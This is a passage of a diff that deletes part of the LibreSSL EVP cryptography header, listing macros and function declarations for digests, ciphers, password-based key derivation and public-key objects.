-                                        (char *)(eckey))
-#endif
-
-#ifndef OPENSSL_NO_GOST
-#define EVP_PKEY_assign_GOST(pkey,gostkey) EVP_PKEY_assign((pkey),EVP_PKEY_GOSTR01,\
-                                        (char *)(gostkey))
-#endif
-
-/* Add some extra combinations */
-#define EVP_get_digestbynid(a) EVP_get_digestbyname(OBJ_nid2sn(a))
-#define EVP_get_digestbyobj(a) EVP_get_digestbynid(OBJ_obj2nid(a))
-#define EVP_get_cipherbynid(a) EVP_get_cipherbyname(OBJ_nid2sn(a))
-#define EVP_get_cipherbyobj(a) EVP_get_cipherbynid(OBJ_obj2nid(a))
-
-int EVP_MD_type(const EVP_MD *md);
-#define EVP_MD_nid(e)			EVP_MD_type(e)
-#define EVP_MD_name(e)			OBJ_nid2sn(EVP_MD_nid(e))
-int EVP_MD_pkey_type(const EVP_MD *md);
-int EVP_MD_size(const EVP_MD *md);
-int EVP_MD_block_size(const EVP_MD *md);
-unsigned long EVP_MD_flags(const EVP_MD *md);
-
-const EVP_MD *EVP_MD_CTX_md(const EVP_MD_CTX *ctx);
-#define EVP_MD_CTX_size(e)		EVP_MD_size(EVP_MD_CTX_md(e))
-#define EVP_MD_CTX_block_size(e)	EVP_MD_block_size(EVP_MD_CTX_md(e))
-#define EVP_MD_CTX_type(e)		EVP_MD_type(EVP_MD_CTX_md(e))
-
-int EVP_CIPHER_nid(const EVP_CIPHER *cipher);
-#define EVP_CIPHER_name(e)		OBJ_nid2sn(EVP_CIPHER_nid(e))
-int EVP_CIPHER_block_size(const EVP_CIPHER *cipher);
-int EVP_CIPHER_key_length(const EVP_CIPHER *cipher);
-int EVP_CIPHER_iv_length(const EVP_CIPHER *cipher);
-unsigned long EVP_CIPHER_flags(const EVP_CIPHER *cipher);
-#define EVP_CIPHER_mode(e)		(EVP_CIPHER_flags(e) & EVP_CIPH_MODE)
-
-const EVP_CIPHER * EVP_CIPHER_CTX_cipher(const EVP_CIPHER_CTX *ctx);
-int EVP_CIPHER_CTX_nid(const EVP_CIPHER_CTX *ctx);
-int EVP_CIPHER_CTX_block_size(const EVP_CIPHER_CTX *ctx);
-int EVP_CIPHER_CTX_key_length(const EVP_CIPHER_CTX *ctx);
-int EVP_CIPHER_CTX_iv_length(const EVP_CIPHER_CTX *ctx);
-int EVP_CIPHER_CTX_copy(EVP_CIPHER_CTX *out, const EVP_CIPHER_CTX *in);
-void * EVP_CIPHER_CTX_get_app_data(const EVP_CIPHER_CTX *ctx);
-void EVP_CIPHER_CTX_set_app_data(EVP_CIPHER_CTX *ctx, void *data);
-#define EVP_CIPHER_CTX_type(c)         EVP_CIPHER_type(EVP_CIPHER_CTX_cipher(c))
-unsigned long EVP_CIPHER_CTX_flags(const EVP_CIPHER_CTX *ctx);
-#define EVP_CIPHER_CTX_mode(e)		(EVP_CIPHER_CTX_flags(e) & EVP_CIPH_MODE)
-
-#define EVP_ENCODE_LENGTH(l)	(((l+2)/3*4)+(l/48+1)*2+80)
-#define EVP_DECODE_LENGTH(l)	((l+3)/4*3+80)
-
-#define EVP_SignInit_ex(a,b,c)		EVP_DigestInit_ex(a,b,c)
-#define EVP_SignInit(a,b)		EVP_DigestInit(a,b)
-#define EVP_SignUpdate(a,b,c)		EVP_DigestUpdate(a,b,c)
-#define	EVP_VerifyInit_ex(a,b,c)	EVP_DigestInit_ex(a,b,c)
-#define	EVP_VerifyInit(a,b)		EVP_DigestInit(a,b)
-#define	EVP_VerifyUpdate(a,b,c)		EVP_DigestUpdate(a,b,c)
-#define EVP_OpenUpdate(a,b,c,d,e)	EVP_DecryptUpdate(a,b,c,d,e)
-#define EVP_SealUpdate(a,b,c,d,e)	EVP_EncryptUpdate(a,b,c,d,e)
-#define EVP_DigestSignUpdate(a,b,c)	EVP_DigestUpdate(a,b,c)
-#define EVP_DigestVerifyUpdate(a,b,c)	EVP_DigestUpdate(a,b,c)
-
-#define BIO_set_md(b,md)		BIO_ctrl(b,BIO_C_SET_MD,0,(char *)md)
-#define BIO_get_md(b,mdp)		BIO_ctrl(b,BIO_C_GET_MD,0,(char *)mdp)
-#define BIO_get_md_ctx(b,mdcp)     BIO_ctrl(b,BIO_C_GET_MD_CTX,0,(char *)mdcp)
-#define BIO_set_md_ctx(b,mdcp)     BIO_ctrl(b,BIO_C_SET_MD_CTX,0,(char *)mdcp)
-#define BIO_get_cipher_status(b)	BIO_ctrl(b,BIO_C_GET_CIPHER_STATUS,0,NULL)
-#define BIO_get_cipher_ctx(b,c_pp)	BIO_ctrl(b,BIO_C_GET_CIPHER_CTX,0,(char *)c_pp)
-
-int EVP_Cipher(EVP_CIPHER_CTX *c, unsigned char *out, const unsigned char *in,
-    unsigned int inl);
-
-#define EVP_add_cipher_alias(n,alias) \
-	OBJ_NAME_add((alias),OBJ_NAME_TYPE_CIPHER_METH|OBJ_NAME_ALIAS,(n))
-#define EVP_add_digest_alias(n,alias) \
-	OBJ_NAME_add((alias),OBJ_NAME_TYPE_MD_METH|OBJ_NAME_ALIAS,(n))
-#define EVP_delete_cipher_alias(alias) \
-	OBJ_NAME_remove(alias,OBJ_NAME_TYPE_CIPHER_METH|OBJ_NAME_ALIAS);
-#define EVP_delete_digest_alias(alias) \
-	OBJ_NAME_remove(alias,OBJ_NAME_TYPE_MD_METH|OBJ_NAME_ALIAS);
-
-void EVP_MD_CTX_init(EVP_MD_CTX *ctx);
-int EVP_MD_CTX_cleanup(EVP_MD_CTX *ctx);
-EVP_MD_CTX *EVP_MD_CTX_create(void);
-void EVP_MD_CTX_destroy(EVP_MD_CTX *ctx);
-int EVP_MD_CTX_copy_ex(EVP_MD_CTX *out, const EVP_MD_CTX *in);
-void EVP_MD_CTX_set_flags(EVP_MD_CTX *ctx, int flags);
-void EVP_MD_CTX_clear_flags(EVP_MD_CTX *ctx, int flags);
-int EVP_MD_CTX_ctrl(EVP_MD_CTX *ctx, int type, int arg, void *ptr);
-int EVP_MD_CTX_test_flags(const EVP_MD_CTX *ctx, int flags);
-int EVP_DigestInit_ex(EVP_MD_CTX *ctx, const EVP_MD *type, ENGINE *impl);
-int EVP_DigestUpdate(EVP_MD_CTX *ctx, const void *d, size_t cnt);
-int EVP_DigestFinal_ex(EVP_MD_CTX *ctx, unsigned char *md, unsigned int *s);
-int EVP_Digest(const void *data, size_t count, unsigned char *md,
-    unsigned int *size, const EVP_MD *type, ENGINE *impl);
-
-int EVP_MD_CTX_copy(EVP_MD_CTX *out, const EVP_MD_CTX *in);
-int EVP_DigestInit(EVP_MD_CTX *ctx, const EVP_MD *type);
-int EVP_DigestFinal(EVP_MD_CTX *ctx, unsigned char *md, unsigned int *s);
-
-int EVP_read_pw_string(char *buf, int length, const char *prompt, int verify);
-int EVP_read_pw_string_min(char *buf, int minlen, int maxlen,
-    const char *prompt, int verify);
-void EVP_set_pw_prompt(const char *prompt);
-char *EVP_get_pw_prompt(void);
-
-int EVP_BytesToKey(const EVP_CIPHER *type, const EVP_MD *md,
-    const unsigned char *salt, const unsigned char *data, int datal, int count,
-    unsigned char *key, unsigned char *iv);
-
-void EVP_CIPHER_CTX_set_flags(EVP_CIPHER_CTX *ctx, int flags);
-void EVP_CIPHER_CTX_clear_flags(EVP_CIPHER_CTX *ctx, int flags);
-int EVP_CIPHER_CTX_test_flags(const EVP_CIPHER_CTX *ctx, int flags);
-
-int EVP_EncryptInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
-    const unsigned char *key, const unsigned char *iv);
-int EVP_EncryptInit_ex(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
-    ENGINE *impl, const unsigned char *key, const unsigned char *iv);
-int EVP_EncryptUpdate(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl,
-    const unsigned char *in, int inl);
-int EVP_EncryptFinal_ex(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl);
-#ifndef LIBRESSL_INTERNAL
-int EVP_EncryptFinal(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl);
-#endif
-
-int EVP_DecryptInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
-    const unsigned char *key, const unsigned char *iv);
-int EVP_DecryptInit_ex(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
-    ENGINE *impl, const unsigned char *key, const unsigned char *iv);
-int EVP_DecryptUpdate(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl,
-    const unsigned char *in, int inl);
-int EVP_DecryptFinal_ex(EVP_CIPHER_CTX *ctx, unsigned char *outm, int *outl);
-#ifndef LIBRESSL_INTERNAL
-int EVP_DecryptFinal(EVP_CIPHER_CTX *ctx, unsigned char *outm, int *outl);
-#endif
-
-int EVP_CipherInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
-    const unsigned char *key, const unsigned char *iv, int enc);
-int EVP_CipherInit_ex(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
-    ENGINE *impl, const unsigned char *key, const unsigned char *iv, int enc);
-int EVP_CipherUpdate(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl,
-    const unsigned char *in, int inl);
-int EVP_CipherFinal_ex(EVP_CIPHER_CTX *ctx, unsigned char *outm, int *outl);
-#ifndef LIBRESSL_INTERNAL
-int EVP_CipherFinal(EVP_CIPHER_CTX *ctx, unsigned char *outm, int *outl);
-#endif
-	
-int EVP_SignFinal(EVP_MD_CTX *ctx, unsigned char *md, unsigned int *s,
-    EVP_PKEY *pkey);
-
-int EVP_VerifyFinal(EVP_MD_CTX *ctx, const unsigned char *sigbuf,
-    unsigned int siglen, EVP_PKEY *pkey);
-
-int EVP_DigestSignInit(EVP_MD_CTX *ctx, EVP_PKEY_CTX **pctx,
-    const EVP_MD *type, ENGINE *e, EVP_PKEY *pkey);
-int EVP_DigestSignFinal(EVP_MD_CTX *ctx, unsigned char *sigret, size_t *siglen);
-
-int EVP_DigestVerifyInit(EVP_MD_CTX *ctx, EVP_PKEY_CTX **pctx,
-    const EVP_MD *type, ENGINE *e, EVP_PKEY *pkey);
-int EVP_DigestVerifyFinal(EVP_MD_CTX *ctx, unsigned char *sig, size_t siglen);
-
-int EVP_OpenInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *type,
-    const unsigned char *ek, int ekl, const unsigned char *iv, EVP_PKEY *priv);
-int EVP_OpenFinal(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl);
-
-int EVP_SealInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *type,
-    unsigned char **ek, int *ekl, unsigned char *iv, EVP_PKEY **pubk,
-    int npubk);
-int EVP_SealFinal(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl);
-
-void EVP_EncodeInit(EVP_ENCODE_CTX *ctx);
-void EVP_EncodeUpdate(EVP_ENCODE_CTX *ctx, unsigned char *out, int *outl,
-    const unsigned char *in, int inl);
-void EVP_EncodeFinal(EVP_ENCODE_CTX *ctx, unsigned char *out, int *outl);
-int EVP_EncodeBlock(unsigned char *t, const unsigned char *f, int n);
-
-void EVP_DecodeInit(EVP_ENCODE_CTX *ctx);
-int EVP_DecodeUpdate(EVP_ENCODE_CTX *ctx, unsigned char *out, int *outl,
-    const unsigned char *in, int inl);
-int EVP_DecodeFinal(EVP_ENCODE_CTX *ctx, unsigned char *out, int *outl);
-int EVP_DecodeBlock(unsigned char *t, const unsigned char *f, int n);
-
-void EVP_CIPHER_CTX_init(EVP_CIPHER_CTX *a);
-int EVP_CIPHER_CTX_cleanup(EVP_CIPHER_CTX *a);
-EVP_CIPHER_CTX *EVP_CIPHER_CTX_new(void);
-void EVP_CIPHER_CTX_free(EVP_CIPHER_CTX *a);
-int EVP_CIPHER_CTX_set_key_length(EVP_CIPHER_CTX *x, int keylen);
-int EVP_CIPHER_CTX_set_padding(EVP_CIPHER_CTX *c, int pad);
-int EVP_CIPHER_CTX_ctrl(EVP_CIPHER_CTX *ctx, int type, int arg, void *ptr);
-int EVP_CIPHER_CTX_rand_key(EVP_CIPHER_CTX *ctx, unsigned char *key);
-
-#ifndef OPENSSL_NO_BIO
-BIO_METHOD *BIO_f_md(void);
-BIO_METHOD *BIO_f_base64(void);
-BIO_METHOD *BIO_f_cipher(void);
-void BIO_set_cipher(BIO *b, const EVP_CIPHER *c, const unsigned char *k,
-    const unsigned char *i, int enc);
-#endif
-
-const EVP_MD *EVP_md_null(void);
-#ifndef OPENSSL_NO_MD4
-const EVP_MD *EVP_md4(void);
-#endif
-#ifndef OPENSSL_NO_MD5
-const EVP_MD *EVP_md5(void);
-const EVP_MD *EVP_md5_sha1(void);
-#endif
-#ifndef OPENSSL_NO_SHA
-const EVP_MD *EVP_sha1(void);
-const EVP_MD *EVP_dss(void);
-const EVP_MD *EVP_dss1(void);
-const EVP_MD *EVP_ecdsa(void);
-#endif
-#ifndef OPENSSL_NO_SHA256
-const EVP_MD *EVP_sha224(void);
-const EVP_MD *EVP_sha256(void);
-#endif
-#ifndef OPENSSL_NO_SHA512
-const EVP_MD *EVP_sha384(void);
-const EVP_MD *EVP_sha512(void);
-#endif
-#ifndef OPENSSL_NO_RIPEMD
-const EVP_MD *EVP_ripemd160(void);
-#endif
-#ifndef OPENSSL_NO_WHIRLPOOL
-const EVP_MD *EVP_whirlpool(void);
-#endif
-#ifndef OPENSSL_NO_GOST
-const EVP_MD *EVP_gostr341194(void);
-const EVP_MD *EVP_gost2814789imit(void);
-const EVP_MD *EVP_streebog256(void);
-const EVP_MD *EVP_streebog512(void);
-#endif
-const EVP_CIPHER *EVP_enc_null(void);		/* does nothing :-) */
-#ifndef OPENSSL_NO_DES
-const EVP_CIPHER *EVP_des_ecb(void);
-const EVP_CIPHER *EVP_des_ede(void);
-const EVP_CIPHER *EVP_des_ede3(void);
-const EVP_CIPHER *EVP_des_ede_ecb(void);
-const EVP_CIPHER *EVP_des_ede3_ecb(void);
-const EVP_CIPHER *EVP_des_cfb64(void);
-# define EVP_des_cfb EVP_des_cfb64
-const EVP_CIPHER *EVP_des_cfb1(void);
-const EVP_CIPHER *EVP_des_cfb8(void);
-const EVP_CIPHER *EVP_des_ede_cfb64(void);
-# define EVP_des_ede_cfb EVP_des_ede_cfb64
-const EVP_CIPHER *EVP_des_ede3_cfb64(void);
-# define EVP_des_ede3_cfb EVP_des_ede3_cfb64
-const EVP_CIPHER *EVP_des_ede3_cfb1(void);
-const EVP_CIPHER *EVP_des_ede3_cfb8(void);
-const EVP_CIPHER *EVP_des_ofb(void);
-const EVP_CIPHER *EVP_des_ede_ofb(void);
-const EVP_CIPHER *EVP_des_ede3_ofb(void);
-const EVP_CIPHER *EVP_des_cbc(void);
-const EVP_CIPHER *EVP_des_ede_cbc(void);
-const EVP_CIPHER *EVP_des_ede3_cbc(void);
-const EVP_CIPHER *EVP_desx_cbc(void);
-#endif
-#ifndef OPENSSL_NO_RC4
-const EVP_CIPHER *EVP_rc4(void);
-const EVP_CIPHER *EVP_rc4_40(void);
-#ifndef OPENSSL_NO_MD5
-const EVP_CIPHER *EVP_rc4_hmac_md5(void);
-#endif
-#endif
-#ifndef OPENSSL_NO_IDEA
-const EVP_CIPHER *EVP_idea_ecb(void);
-const EVP_CIPHER *EVP_idea_cfb64(void);
-# define EVP_idea_cfb EVP_idea_cfb64
-const EVP_CIPHER *EVP_idea_ofb(void);
-const EVP_CIPHER *EVP_idea_cbc(void);
-#endif
-#ifndef OPENSSL_NO_RC2
-const EVP_CIPHER *EVP_rc2_ecb(void);
-const EVP_CIPHER *EVP_rc2_cbc(void);
-const EVP_CIPHER *EVP_rc2_40_cbc(void);
-const EVP_CIPHER *EVP_rc2_64_cbc(void);
-const EVP_CIPHER *EVP_rc2_cfb64(void);
-# define EVP_rc2_cfb EVP_rc2_cfb64
-const EVP_CIPHER *EVP_rc2_ofb(void);
-#endif
-#ifndef OPENSSL_NO_BF
-const EVP_CIPHER *EVP_bf_ecb(void);
-const EVP_CIPHER *EVP_bf_cbc(void);
-const EVP_CIPHER *EVP_bf_cfb64(void);
-# define EVP_bf_cfb EVP_bf_cfb64
-const EVP_CIPHER *EVP_bf_ofb(void);
-#endif
-#ifndef OPENSSL_NO_CAST
-const EVP_CIPHER *EVP_cast5_ecb(void);
-const EVP_CIPHER *EVP_cast5_cbc(void);
-const EVP_CIPHER *EVP_cast5_cfb64(void);
-# define EVP_cast5_cfb EVP_cast5_cfb64
-const EVP_CIPHER *EVP_cast5_ofb(void);
-#endif
-#ifndef OPENSSL_NO_AES
-const EVP_CIPHER *EVP_aes_128_ecb(void);
-const EVP_CIPHER *EVP_aes_128_cbc(void);
-const EVP_CIPHER *EVP_aes_128_cfb1(void);
-const EVP_CIPHER *EVP_aes_128_cfb8(void);
-const EVP_CIPHER *EVP_aes_128_cfb128(void);
-# define EVP_aes_128_cfb EVP_aes_128_cfb128
-const EVP_CIPHER *EVP_aes_128_ofb(void);
-const EVP_CIPHER *EVP_aes_128_ctr(void);
-const EVP_CIPHER *EVP_aes_128_ccm(void);
-const EVP_CIPHER *EVP_aes_128_gcm(void);
-const EVP_CIPHER *EVP_aes_128_xts(void);
-const EVP_CIPHER *EVP_aes_192_ecb(void);
-const EVP_CIPHER *EVP_aes_192_cbc(void);
-const EVP_CIPHER *EVP_aes_192_cfb1(void);
-const EVP_CIPHER *EVP_aes_192_cfb8(void);
-const EVP_CIPHER *EVP_aes_192_cfb128(void);
-# define EVP_aes_192_cfb EVP_aes_192_cfb128
-const EVP_CIPHER *EVP_aes_192_ofb(void);
-const EVP_CIPHER *EVP_aes_192_ctr(void);
-const EVP_CIPHER *EVP_aes_192_ccm(void);
-const EVP_CIPHER *EVP_aes_192_gcm(void);
-const EVP_CIPHER *EVP_aes_256_ecb(void);
-const EVP_CIPHER *EVP_aes_256_cbc(void);
-const EVP_CIPHER *EVP_aes_256_cfb1(void);
-const EVP_CIPHER *EVP_aes_256_cfb8(void);
-const EVP_CIPHER *EVP_aes_256_cfb128(void);
-# define EVP_aes_256_cfb EVP_aes_256_cfb128
-const EVP_CIPHER *EVP_aes_256_ofb(void);
-const EVP_CIPHER *EVP_aes_256_ctr(void);
-const EVP_CIPHER *EVP_aes_256_ccm(void);
-const EVP_CIPHER *EVP_aes_256_gcm(void);
-const EVP_CIPHER *EVP_aes_256_xts(void);
-#if !defined(OPENSSL_NO_SHA) && !defined(OPENSSL_NO_SHA1)
-const EVP_CIPHER *EVP_aes_128_cbc_hmac_sha1(void);
-const EVP_CIPHER *EVP_aes_256_cbc_hmac_sha1(void);
-#endif
-#endif
-#ifndef OPENSSL_NO_CAMELLIA
-const EVP_CIPHER *EVP_camellia_128_ecb(void);
-const EVP_CIPHER *EVP_camellia_128_cbc(void);
-const EVP_CIPHER *EVP_camellia_128_cfb1(void);
-const EVP_CIPHER *EVP_camellia_128_cfb8(void);
-const EVP_CIPHER *EVP_camellia_128_cfb128(void);
-# define EVP_camellia_128_cfb EVP_camellia_128_cfb128
-const EVP_CIPHER *EVP_camellia_128_ofb(void);
-const EVP_CIPHER *EVP_camellia_192_ecb(void);
-const EVP_CIPHER *EVP_camellia_192_cbc(void);
-const EVP_CIPHER *EVP_camellia_192_cfb1(void);
-const EVP_CIPHER *EVP_camellia_192_cfb8(void);
-const EVP_CIPHER *EVP_camellia_192_cfb128(void);
-# define EVP_camellia_192_cfb EVP_camellia_192_cfb128
-const EVP_CIPHER *EVP_camellia_192_ofb(void);
-const EVP_CIPHER *EVP_camellia_256_ecb(void);
-const EVP_CIPHER *EVP_camellia_256_cbc(void);
-const EVP_CIPHER *EVP_camellia_256_cfb1(void);
-const EVP_CIPHER *EVP_camellia_256_cfb8(void);
-const EVP_CIPHER *EVP_camellia_256_cfb128(void);
-# define EVP_camellia_256_cfb EVP_camellia_256_cfb128
-const EVP_CIPHER *EVP_camellia_256_ofb(void);
-#endif
-
-#ifndef OPENSSL_NO_CHACHA
-const EVP_CIPHER *EVP_chacha20(void);
-#endif
-
-#ifndef OPENSSL_NO_GOST
-const EVP_CIPHER *EVP_gost2814789_ecb(void);
-const EVP_CIPHER *EVP_gost2814789_cfb64(void);
-const EVP_CIPHER *EVP_gost2814789_cnt(void);
-#endif
-
-void OPENSSL_add_all_algorithms_noconf(void);
-void OPENSSL_add_all_algorithms_conf(void);
-
-#ifdef OPENSSL_LOAD_CONF
-#define OpenSSL_add_all_algorithms() OPENSSL_add_all_algorithms_conf()
-#else
-#define OpenSSL_add_all_algorithms() OPENSSL_add_all_algorithms_noconf()
-#endif
-
-void OpenSSL_add_all_ciphers(void);
-void OpenSSL_add_all_digests(void);
-
-#define SSLeay_add_all_algorithms() OpenSSL_add_all_algorithms()
-#define SSLeay_add_all_ciphers() OpenSSL_add_all_ciphers()
-#define SSLeay_add_all_digests() OpenSSL_add_all_digests()
-
-int EVP_add_cipher(const EVP_CIPHER *cipher);
-int EVP_add_digest(const EVP_MD *digest);
-
-const EVP_CIPHER *EVP_get_cipherbyname(const char *name);
-const EVP_MD *EVP_get_digestbyname(const char *name);
-void EVP_cleanup(void);
-
-void EVP_CIPHER_do_all(void (*fn)(const EVP_CIPHER *ciph, const char *from,
-    const char *to, void *x), void *arg);
-void EVP_CIPHER_do_all_sorted(void (*fn)(const EVP_CIPHER *ciph,
-    const char *from, const char *to, void *x), void *arg);
-
-void EVP_MD_do_all(void (*fn)(const EVP_MD *ciph, const char *from,
-    const char *to, void *x), void *arg);
-void EVP_MD_do_all_sorted(void (*fn)(const EVP_MD *ciph, const char *from,
-    const char *to, void *x), void *arg);
-
-int EVP_PKEY_decrypt_old(unsigned char *dec_key, const unsigned char *enc_key,
-    int enc_key_len, EVP_PKEY *private_key);
-int EVP_PKEY_encrypt_old(unsigned char *enc_key, const unsigned char *key,
-    int key_len, EVP_PKEY *pub_key);
-int EVP_PKEY_type(int type);
-int EVP_PKEY_id(const EVP_PKEY *pkey);
-int EVP_PKEY_base_id(const EVP_PKEY *pkey);
-int EVP_PKEY_bits(EVP_PKEY *pkey);
-int EVP_PKEY_size(EVP_PKEY *pkey);
-int EVP_PKEY_set_type(EVP_PKEY *pkey, int type);
-int EVP_PKEY_set_type_str(EVP_PKEY *pkey, const char *str, int len);
-int EVP_PKEY_assign(EVP_PKEY *pkey, int type, void *key);
-void *EVP_PKEY_get0(EVP_PKEY *pkey);
-
-#ifndef OPENSSL_NO_RSA
-struct rsa_st;
-int EVP_PKEY_set1_RSA(EVP_PKEY *pkey, struct rsa_st *key);
-struct rsa_st *EVP_PKEY_get1_RSA(EVP_PKEY *pkey);
-#endif
-#ifndef OPENSSL_NO_DSA
-struct dsa_st;
-int EVP_PKEY_set1_DSA(EVP_PKEY *pkey, struct dsa_st *key);
-struct dsa_st *EVP_PKEY_get1_DSA(EVP_PKEY *pkey);
-#endif
-#ifndef OPENSSL_NO_DH
-struct dh_st;
-int EVP_PKEY_set1_DH(EVP_PKEY *pkey, struct dh_st *key);
-struct dh_st *EVP_PKEY_get1_DH(EVP_PKEY *pkey);
-#endif
-#ifndef OPENSSL_NO_EC
-struct ec_key_st;
-int EVP_PKEY_set1_EC_KEY(EVP_PKEY *pkey, struct ec_key_st *key);
-struct ec_key_st *EVP_PKEY_get1_EC_KEY(EVP_PKEY *pkey);
-#endif
-#ifndef OPENSSL_NO_GOST
-struct gost_key_st;
-#endif
-
-EVP_PKEY *EVP_PKEY_new(void);
-void EVP_PKEY_free(EVP_PKEY *pkey);
-
-EVP_PKEY *d2i_PublicKey(int type, EVP_PKEY **a, const unsigned char **pp,
-    long length);
-int i2d_PublicKey(EVP_PKEY *a, unsigned char **pp);
-
-EVP_PKEY *d2i_PrivateKey(int type, EVP_PKEY **a, const unsigned char **pp,
-    long length);
-EVP_PKEY *d2i_AutoPrivateKey(EVP_PKEY **a, const unsigned char **pp,
-    long length);
-int i2d_PrivateKey(EVP_PKEY *a, unsigned char **pp);
-
-int EVP_PKEY_copy_parameters(EVP_PKEY *to, const EVP_PKEY *from);
-int EVP_PKEY_missing_parameters(const EVP_PKEY *pkey);
-int EVP_PKEY_save_parameters(EVP_PKEY *pkey, int mode);
-int EVP_PKEY_cmp_parameters(const EVP_PKEY *a, const EVP_PKEY *b);
-
-int EVP_PKEY_cmp(const EVP_PKEY *a, const EVP_PKEY *b);
-
-int EVP_PKEY_print_public(BIO *out, const EVP_PKEY *pkey, int indent,
-    ASN1_PCTX *pctx);
-int EVP_PKEY_print_private(BIO *out, const EVP_PKEY *pkey, int indent,
-    ASN1_PCTX *pctx);
-int EVP_PKEY_print_params(BIO *out, const EVP_PKEY *pkey, int indent,
-    ASN1_PCTX *pctx);
-
-int EVP_PKEY_get_default_digest_nid(EVP_PKEY *pkey, int *pnid);
-
-int EVP_CIPHER_type(const EVP_CIPHER *ctx);
-
-/* calls methods */
-int EVP_CIPHER_param_to_asn1(EVP_CIPHER_CTX *c, ASN1_TYPE *type);
-int EVP_CIPHER_asn1_to_param(EVP_CIPHER_CTX *c, ASN1_TYPE *type);
-
-/* These are used by EVP_CIPHER methods */
-int EVP_CIPHER_set_asn1_iv(EVP_CIPHER_CTX *c, ASN1_TYPE *type);
-int EVP_CIPHER_get_asn1_iv(EVP_CIPHER_CTX *c, ASN1_TYPE *type);
-
-/* PKCS5 password based encryption */
-int PKCS5_PBE_keyivgen(EVP_CIPHER_CTX *ctx, const char *pass, int passlen,
-    ASN1_TYPE *param, const EVP_CIPHER *cipher, const EVP_MD *md, int en_de);
-int PKCS5_PBKDF2_HMAC_SHA1(const char *pass, int passlen,
-    const unsigned char *salt, int saltlen, int iter, int keylen,
-    unsigned char *out);
-int PKCS5_PBKDF2_HMAC(const char *pass, int passlen, const unsigned char *salt,
-    int saltlen, int iter, const EVP_MD *digest, int keylen,
-    unsigned char *out);
-int PKCS5_v2_PBE_keyivgen(EVP_CIPHER_CTX *ctx, const char *pass, int passlen,
-    ASN1_TYPE *param, const EVP_CIPHER *cipher, const EVP_MD *md,
-    int en_de);
-
-void PKCS5_PBE_add(void);
-
-int EVP_PBE_CipherInit (ASN1_OBJECT *pbe_obj, const char *pass, int passlen,
-    ASN1_TYPE *param, EVP_CIPHER_CTX *ctx, int en_de);
-
-/* PBE type */
-
-/* Can appear as the outermost AlgorithmIdentifier */
-#define EVP_PBE_TYPE_OUTER	0x0
-/* Is an PRF type OID */
-#define EVP_PBE_TYPE_PRF	0x1
-
-int EVP_PBE_alg_add_type(int pbe_type, int pbe_nid, int cipher_nid, int md_nid,
-    EVP_PBE_KEYGEN *keygen);
-int EVP_PBE_alg_add(int nid, const EVP_CIPHER *cipher, const EVP_MD *md,
-    EVP_PBE_KEYGEN *keygen);
-int EVP_PBE_find(int type, int pbe_nid, int *pcnid, int *pmnid,
-    EVP_PBE_KEYGEN **pkeygen);
-void EVP_PBE_cleanup(void);
-
-#define ASN1_PKEY_ALIAS		0x1
-#define ASN1_PKEY_DYNAMIC	0x2
-#define ASN1_PKEY_SIGPARAM_NULL	0x4
-
-#define ASN1_PKEY_CTRL_PKCS7_SIGN	0x1
-#define ASN1_PKEY_CTRL_PKCS7_ENCRYPT	0x2
-#define ASN1_PKEY_CTRL_DEFAULT_MD_NID	0x3
-#define ASN1_PKEY_CTRL_CMS_SIGN		0x5
-#define ASN1_PKEY_CTRL_CMS_ENVELOPE	0x7
-
-int EVP_PKEY_asn1_get_count(void);
-const EVP_PKEY_ASN1_METHOD *EVP_PKEY_asn1_get0(int idx);
-const EVP_PKEY_ASN1_METHOD *EVP_PKEY_asn1_find(ENGINE **pe, int type);
-const EVP_PKEY_ASN1_METHOD *EVP_PKEY_asn1_find_str(ENGINE **pe,
-    const char *str, int len);
-int EVP_PKEY_asn1_add0(const EVP_PKEY_ASN1_METHOD *ameth);
-int EVP_PKEY_asn1_add_alias(int to, int from);
-int EVP_PKEY_asn1_get0_info(int *ppkey_id, int *pkey_base_id, int *ppkey_flags,
-    const char **pinfo, const char **ppem_str,
-    const EVP_PKEY_ASN1_METHOD *ameth);
-
-const EVP_PKEY_ASN1_METHOD* EVP_PKEY_get0_asn1(EVP_PKEY *pkey);
-EVP_PKEY_ASN1_METHOD* EVP_PKEY_asn1_new(int id, int flags, const char *pem_str,
-    const char *info);
-void EVP_PKEY_asn1_copy(EVP_PKEY_ASN1_METHOD *dst,
-    const EVP_PKEY_ASN1_METHOD *src);
-void EVP_PKEY_asn1_free(EVP_PKEY_ASN1_METHOD *ameth);
-void EVP_PKEY_asn1_set_public(EVP_PKEY_ASN1_METHOD *ameth,
-    int (*pub_decode)(EVP_PKEY *pk, X509_PUBKEY *pub),
-    int (*pub_encode)(X509_PUBKEY *pub, const EVP_PKEY *pk),
-    int (*pub_cmp)(const EVP_PKEY *a, const EVP_PKEY *b),
-    int (*pub_print)(BIO *out, const EVP_PKEY *pkey, int indent,
-    ASN1_PCTX *pctx),
-    int (*pkey_size)(const EVP_PKEY *pk),
-    int (*pkey_bits)(const EVP_PKEY *pk));
-void EVP_PKEY_asn1_set_private(EVP_PKEY_ASN1_METHOD *ameth,
-    int (*priv_decode)(EVP_PKEY *pk, PKCS8_PRIV_KEY_INFO *p8inf),
-    int (*priv_encode)(PKCS8_PRIV_KEY_INFO *p8, const EVP_PKEY *pk),
-    int (*priv_print)(BIO *out, const EVP_PKEY *pkey, int indent,
-    ASN1_PCTX *pctx));
-void EVP_PKEY_asn1_set_param(EVP_PKEY_ASN1_METHOD *ameth,
-    int (*param_decode)(EVP_PKEY *pkey, const unsigned char **pder, int derlen),
-    int (*param_encode)(const EVP_PKEY *pkey, unsigned char **pder),
-    int (*param_missing)(const EVP_PKEY *pk),
-    int (*param_copy)(EVP_PKEY *to, const EVP_PKEY *from),
-    int (*param_cmp)(const EVP_PKEY *a, const EVP_PKEY *b),
-    int (*param_print)(BIO *out, const EVP_PKEY *pkey, int indent,
